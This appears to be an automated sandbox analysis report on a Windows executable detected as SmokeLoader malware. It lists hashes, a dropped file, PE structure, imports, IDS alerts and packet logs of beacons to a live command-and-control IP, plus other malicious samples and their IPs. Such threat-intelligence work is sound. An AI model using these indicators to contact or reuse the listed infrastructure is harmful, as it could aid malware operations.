                                            tnc-corp.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 187.204.28.205
                                            Ypp1MuoIa1.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 190.220.21.28
                                            5iwz8543Xc.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 190.146.112.188
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 185.12.79.25
                                            z2vfX2REnQ.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 186.193.139.53
                                            d8jsKv1X4Q.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 177.222.41.236
                                            PSyWSlhDa5.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 58.151.148.90
                                            wxy6cQKIqG.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 211.171.233.126
                                            H3CVATCJSD.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 211.181.24.132
                                            Y0KE01P97o.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 187.199.203.72

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            LGDACOMLGDACOMCorporationKRyakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 118.129.9.235
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 123.140.76.146
                                            sparc.elfGet hashmaliciousUnknownBrowse
                                            • 115.92.2.125
                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                            • 211.168.94.59
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 58.75.113.132
                                            mipsel.elfGet hashmaliciousUnknownBrowse
                                            • 112.217.33.43
                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 1.220.134.192
                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                            • 58.78.205.83
                                            arm7.elfGet hashmaliciousUnknownBrowse
                                            • 106.244.84.80
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 211.181.24.132

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Roaming\tcgiwaf

                                            Download File
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):376832
                                            Entropy (8bit):6.531759115195053
                                            Encrypted:false
                                            SSDEEP:6144:gQLgu6NlN0niBcbNynh3oDisWPHVz0Ws1gbBqkNj8f:gQ5690icodkifKWs2BqkN
                                            MD5:4BB69F9FAD0620ECB64971676B9F2CBC
                                            SHA1:519D65503D586D0442EA411D03E790D52B564EEE
                                            SHA-256:6CE6A03625C3A1E2B97D490363A3EC5BE1706EC424493D7DE2C9CAD2644C3311
                                            SHA-512:7168F65A3362C41B5FE7E4BDA908A0372B1061CF100B841715C854FCDA4635C0E722D37309DE71D7E16B9D94302B9A21F36353A0C1B9F02FD68FE3FE1C3BEDEA
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 39%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s.(!J./s.G!J./s..!J...1.4!J.1!K..!J./s..0!J./s.0!J./s.0!J.Rich1!J.........................PE..L.....td.............................O............@................................. .......................................X...<............................p......................................@/..@............................................text...\........................... ..`.data............`..................@....rsrc...............................@..@.reloc..2....p......................@..B................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\tcgiwaf:Zone.Identifier

                                            Download File
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.531759115195053
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:2Qvkmk7HGr.exe
                                            File size:376'832 bytes
                                            MD5:4bb69f9fad0620ecb64971676b9f2cbc
                                            SHA1:519d65503d586d0442ea411d03e790d52b564eee
                                            SHA256:6ce6a03625c3a1e2b97d490363a3ec5be1706ec424493d7de2c9cad2644c3311
                                            SHA512:7168f65a3362c41b5fe7e4bda908a0372b1061cf100b841715c854fcda4635c0e722d37309de71d7e16b9d94302b9a21f36353a0c1b9f02fd68fe3fe1c3bedea
                                            SSDEEP:6144:gQLgu6NlN0niBcbNynh3oDisWPHVz0Ws1gbBqkNj8f:gQ5690icodkifKWs2BqkN
                                            TLSH:B084F12239D0C072D5A756304835D7A42A3FBD325A61C55F37583B6F2E332D2AA3636B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s..(!J./s..G!J./s...!J...1.4!J.1!K..!J./s..0!J./s..0!J./s..0!J.Rich1!J.........................PE..L.....td...

                                            File Icon

                                            Icon Hash:60406e76566e5c46

                                            Static PE Info

                                            General

                                            Entrypoint:0x404fc1
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x647409B6 [Mon May 29 02:11:02 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:734589f5246b662a5747f60ad9c50ca5

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F16BD119F23h
                                            jmp 00007F16BD1152FEh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 004012ACh
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007F16BD11548Eh
                                            test byte ptr [eax], 00000008h
                                            je 00007F16BD115489h
                                            mov dword ptr [ebp-0Ch], 01994000h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            push dword ptr [ebp-10h]
                                            push dword ptr [ebp-1Ch]
                                            push dword ptr [ebp-20h]
                                            call dword ptr [004010DCh]
                                            leave
                                            retn 0008h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push ecx
                                            push ebx
                                            mov eax, dword ptr [ebp+0Ch]
                                            add eax, 0Ch
                                            mov dword ptr [ebp-04h], eax
                                            mov ebx, dword ptr fs:[00000000h]
                                            mov eax, dword ptr [ebx]
                                            mov dword ptr fs:[00000000h], eax
                                            mov eax, dword ptr [ebp+08h]
                                            mov ebx, dword ptr [ebp+0Ch]
                                            mov ebp, dword ptr [ebp-04h]
                                            mov esp, dword ptr [ebx-04h]
                                            jmp eax
                                            pop ebx
                                            leave
                                            retn 0008h
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push ecx
                                            push ecx
                                            push ebx
                                            push esi
                                            push edi
                                            mov esi, dword ptr fs:[00000000h]
                                            mov dword ptr [ebp-04h], esi
                                            mov dword ptr [ebp-08h], 00405089h
                                            push 00000000h
                                            push dword ptr [ebp+0Ch]
                                            push dword ptr [ebp-08h]
                                            push dword ptr [ebp+08h]
                                            call 00007F16BD12289Ah

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [C++] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x4a3580x3c.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x9ee0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000xd04.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f400x40.text
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x49d5c0x49e00eadfd2c747f20fe6ac4a71fc9841e0baFalse0.7261394881556683data7.0024890042663355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .data0x4b0000x1199c0x60007533c829322fe243afafb774a12f4603False0.08304850260416667data0.9871638251375947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x5d0000x9ee00xa00084539bd8d34906b7b6a50500487bfccfFalse0.455322265625data5.178429957892636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x670000x1c320x1e005c8c35ed1ab5a0d1207fbd5baa0f41b3False0.3671875data3.739122301762688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_CURSOR0x63d700x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                            RT_CURSOR0x640a00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                            RT_CURSOR0x641f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                            RT_CURSOR0x650a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                            RT_CURSOR0x659480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                            RT_ICON0x5d4f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.392590618336887
                                            RT_ICON0x5d4f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.392590618336887
                                            RT_ICON0x5e3980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5496389891696751
                                            RT_ICON0x5e3980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5496389891696751
                                            RT_ICON0x5ec400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6215437788018433
                                            RT_ICON0x5ec400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6215437788018433
                                            RT_ICON0x5f3080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                            RT_ICON0x5f3080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                            RT_ICON0x5f8700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.49761410788381744
                                            RT_ICON0x5f8700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.49761410788381744
                                            RT_ICON0x61e180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5173545966228893
                                            RT_ICON0x61e180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5173545966228893
                                            RT_ICON0x62ec00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.5004098360655738
                                            RT_ICON0x62ec00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.5004098360655738
                                            RT_ICON0x638480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5682624113475178
                                            RT_ICON0x638480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5682624113475178
                                            RT_DIALOG0x661480x58data0.8977272727272727
                                            RT_STRING0x661a00x57adataTamilIndia0.42368045649072755
                                            RT_STRING0x661a00x57adataTamilSri Lanka0.42368045649072755
                                            RT_STRING0x667200x2ccdataTamilIndia0.473463687150838
                                            RT_STRING0x667200x2ccdataTamilSri Lanka0.473463687150838
                                            RT_STRING0x669f00x4eadataTamilIndia0.4507154213036566
                                            RT_STRING0x669f00x4eadataTamilSri Lanka0.4507154213036566
                                            RT_ACCELERATOR0x63d280x48dataTamilIndia0.8472222222222222
                                            RT_ACCELERATOR0x63d280x48dataTamilSri Lanka0.8472222222222222
                                            RT_GROUP_CURSOR0x641d00x22data1.0294117647058822
                                            RT_GROUP_CURSOR0x65eb00x30data0.9375
                                            RT_GROUP_ICON0x63cb00x76dataTamilIndia0.6610169491525424
                                            RT_GROUP_ICON0x63cb00x76dataTamilSri Lanka0.6610169491525424
                                            RT_VERSION0x65ee00x264data0.5359477124183006

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetComputerNameA, TlsGetValue, GetConsoleAliasExesA, CreateProcessW, ClearCommError, InterlockedIncrement, GetCurrentProcess, SetEnvironmentVariableW, SetComputerNameW, GetTickCount, CreateNamedPipeW, EnumTimeFormatsA, CreateActCtxW, GetCurrencyFormatW, GetEnvironmentStrings, SetFileShortNameW, GetLocaleInfoW, ReadConsoleInputA, SetVolumeMountPointA, GetVersionExW, GetTimeFormatW, GetFileAttributesW, GetModuleFileNameW, GetShortPathNameA, CreateJobObjectA, LCMapStringA, VerifyVersionInfoW, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceA, GlobalFree, GetTempFileNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, GetNumberFormatW, OpenEventA, GetCommMask, OpenJobObjectW, GetModuleFileNameA, GlobalUnWire, GetCurrentDirectoryA, GetShortPathNameW, GetDiskFreeSpaceExA, SetFileAttributesW, CommConfigDialogW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, TerminateProcess, IsDebuggerPresent, HeapFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                            USER32.dllGetAltTabInfoW

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            TamilIndia
                                            TamilSri Lanka

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-20T09:38:55.064900+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.455686211.171.233.12680TCP
                                            2024-10-20T09:39:16.001247+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.455718211.171.233.12680TCP
                                            2024-10-20T09:39:33.091816+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.455719211.171.233.12680TCP
                                            2024-10-20T09:39:57.293501+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.455720211.171.233.12680TCP
                                            2024-10-20T09:40:22.237445+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.454853211.171.233.12680TCP
                                            2024-10-20T09:40:43.105564+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.454854211.171.233.12680TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 20, 2024 09:38:53.863775969 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:53.868602991 CEST8055686211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:38:53.868773937 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:53.869266987 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:53.869303942 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:53.874066114 CEST8055686211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:38:53.874205112 CEST8055686211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:38:55.064829111 CEST8055686211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:38:55.064899921 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:55.064965010 CEST5568680192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:38:55.069853067 CEST8055686211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:14.789788008 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:14.794790030 CEST8055718211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:14.794900894 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:14.795099974 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:14.795286894 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:14.799910069 CEST8055718211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:14.800055027 CEST8055718211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:16.000078917 CEST8055718211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:16.001246929 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:16.001317978 CEST5571880192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:16.006119013 CEST8055718211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:31.905277014 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:31.910216093 CEST8055719211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:31.911501884 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:31.911593914 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:31.911611080 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:31.916490078 CEST8055719211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:31.916512012 CEST8055719211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:33.091749907 CEST8055719211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:33.091815948 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:33.091866016 CEST5571980192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:33.096693039 CEST8055719211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:56.127829075 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:56.132867098 CEST8055720211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:56.133037090 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:56.133203030 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:56.133219004 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:56.138170958 CEST8055720211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:56.138183117 CEST8055720211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:57.289772987 CEST8055720211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:39:57.293500900 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:57.293502092 CEST5572080192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:39:57.298705101 CEST8055720211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:21.071033001 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:21.077368975 CEST8054853211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:21.077462912 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:21.077653885 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:21.077682972 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:21.082524061 CEST8054853211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:21.082588911 CEST8054853211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:22.237370014 CEST8054853211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:22.237445116 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:22.237498999 CEST5485380192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:22.243139029 CEST8054853211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:41.907824039 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:41.912914038 CEST8054854211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:41.912995100 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:41.913100004 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:41.913130045 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:41.917915106 CEST8054854211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:41.918102980 CEST8054854211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:43.105464935 CEST8054854211.171.233.126192.168.2.4
                                            Oct 20, 2024 09:40:43.105564117 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:43.106950998 CEST5485480192.168.2.4211.171.233.126
                                            Oct 20, 2024 09:40:43.111843109 CEST8054854211.171.233.126192.168.2.4

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 20, 2024 09:37:23.464411974 CEST6383153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:24.477906942 CEST6383153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:25.493490934 CEST6383153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:27.508902073 CEST6383153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:27.701919079 CEST53638311.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:27.701935053 CEST53638311.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:27.701941013 CEST53638311.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:27.701946020 CEST53638311.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:27.705244064 CEST5485653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:28.712131023 CEST5485653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:29.712110996 CEST5485653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:31.727678061 CEST5485653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:35.727746964 CEST5485653192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:37.214426041 CEST53548561.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.214464903 CEST53548561.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.214497089 CEST53548561.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.214525938 CEST53548561.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.214561939 CEST53548561.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.217175007 CEST5289953192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:37.226423025 CEST53528991.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:37.228619099 CEST5950853192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:38.227806091 CEST5950853192.168.2.41.1.1.1
                                            Oct 20, 2024 09:37:38.234502077 CEST53595081.1.1.1192.168.2.4
                                            Oct 20, 2024 09:37:45.312041044 CEST53595081.1.1.1192.168.2.4
                                            Oct 20, 2024 09:38:51.331573009 CEST5199253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:52.337474108 CEST5199253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:53.337481976 CEST5199253192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:53.862907887 CEST53519921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:38:53.862921953 CEST53519921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:38:53.862989902 CEST53519921.1.1.1192.168.2.4
                                            Oct 20, 2024 09:38:55.068178892 CEST6456453192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:56.071932077 CEST6456453192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:57.081801891 CEST6456453192.168.2.41.1.1.1
                                            Oct 20, 2024 09:38:59.087507010 CEST6456453192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:02.967356920 CEST53645641.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:02.967367887 CEST53645641.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:02.967375994 CEST53645641.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:02.967389107 CEST53645641.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:02.972198963 CEST6054153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:02.981376886 CEST53605411.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:02.985948086 CEST5003553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:03.994590998 CEST5003553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:05.008824110 CEST5003553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:07.000643969 CEST5003553192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:10.781418085 CEST53500351.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:10.781434059 CEST53500351.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:10.781441927 CEST53500351.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:10.781451941 CEST53500351.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:16.004688978 CEST5644053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:17.009521961 CEST5644053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:18.009525061 CEST5644053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:20.009536982 CEST5644053192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:20.848484993 CEST53564401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:20.848506927 CEST53564401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:20.848520041 CEST53564401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:20.848531961 CEST53564401.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:20.864247084 CEST5121153192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:20.873393059 CEST53512111.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:20.882436991 CEST5472353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:21.874319077 CEST5472353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:22.891041994 CEST5472353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:24.885687113 CEST5472353192.168.2.41.1.1.1
                                            Oct 20, 2024 09:39:27.918654919 CEST53547231.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:27.918673038 CEST53547231.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:27.918683052 CEST53547231.1.1.1192.168.2.4
                                            Oct 20, 2024 09:39:27.918694019 CEST53547231.1.1.1192.168.2.4
